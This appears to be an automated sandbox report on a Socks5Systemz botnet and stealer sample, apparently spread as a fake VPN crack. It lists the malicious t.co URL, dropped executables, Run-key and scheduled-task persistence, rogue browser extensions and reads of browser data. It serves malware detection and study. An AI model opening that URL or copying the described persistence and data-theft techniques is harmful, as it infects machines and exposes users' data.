Malware Analysis Report

2024-10-10 10:40

Sample ID 240610-24hx3avdnl
Target https://t.co/f017Vqildt
Tags
socks5systemz botnet discovery execution persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://t.co/f017Vqildt was found to be: Known bad.

Malicious Activity Summary

socks5systemz botnet discovery execution persistence spyware stealer

Socks5Systemz

Detect Socks5Systemz Payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Downloads MZ/PE file

Loads dropped DLL

Reads user/profile data of web browsers

Checks BIOS information in registry

Checks computer location settings

Executes dropped EXE

Drops desktop.ini file(s)

Enumerates connected drives

Adds Run key to start application

Drops Chrome extension

Checks installed software on the system

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Program crash

NSIS installer

Modifies Control Panel

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Checks SCSI registry key(s)

Modifies data under HKEY_USERS

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-10 23:08

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-10 23:08

Reported

2024-06-10 23:11

Platform

win10v2004-20240426-en

Max time kernel

210s

Max time network

210s

Command Line

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://t.co/f017Vqildt

Signatures

Detect Socks5Systemz Payload

Description Indicator Process Target
N/A N/A N/A N/A

Socks5Systemz

botnet socks5systemz

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\CyberGhost-VPN-Crack_Y8CdmvPVjs\CyberGhost-VPN-Crack_Y8CdmvPVjs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-43TA7.tmp\CyberGhost-VPN-Crack_Y8CdmvPVjs.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Passion\passion32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OrugkdTQ\lu3msc4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-U8H3P.tmp\lu3msc4.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Linux MultiMedia Studio\linuxmultiMediastudio32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Linux MultiMedia Studio\linuxmultiMediastudio32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nTDijDlZ\dWa7mnZkjotmkVs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406102309471\assistant\Assistant_110.0.5130.23_Setup.exe_sfx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406102309471\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406102309471\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-43TA7.tmp\CyberGhost-VPN-Crack_Y8CdmvPVjs.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-U8H3P.tmp\lu3msc4.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406102309471\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406102309471\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406102309471\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406102309471\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Snetchball = "C:\\Users\\Admin\\AppData\\Roaming\\Snetchball\\Snetchball.exe" C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_0E84AD23AC2E74B30DEF739614C7EB94 C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_89FBEB9EEBFF8AABF1EBFA20B87AFE7E C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_0E84AD23AC2E74B30DEF739614C7EB94 C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_89FBEB9EEBFF8AABF1EBFA20B87AFE7E C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_95776108E5303B05527E9B63C6628F47 C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_95776108E5303B05527E9B63C6628F47 C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\zVzqvyOSihYKJvOyVZR\OUvhPIz.dll C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File created C:\Program Files (x86)\MovZspCuTpPaC\BhIuTuG.xml C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File created C:\Program Files (x86)\XImIZWEzCDUn\kTsPeqb.dll C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File created C:\Program Files (x86)\RYkefsiHU\QXOSJUk.xml C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File created C:\Program Files (x86)\RXHKfDSqirfU2\RWUdiGIIMBtpx.dll C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File created C:\Program Files (x86)\RXHKfDSqirfU2\VjmwrNA.xml C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File created C:\Program Files (x86)\zVzqvyOSihYKJvOyVZR\QsLDxyt.xml C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File created C:\Program Files (x86)\MovZspCuTpPaC\QAIOVaj.dll C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A
File created C:\Program Files (x86)\RYkefsiHU\WdGIBp.dll C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bozJhwcBWfTIuPvJGw.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\IdVtZOOUCgewbUgTH.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\crLdjPbboKRrxLe.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\abqDtlgLJZrFmRhwl.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Passion\passion32.exe
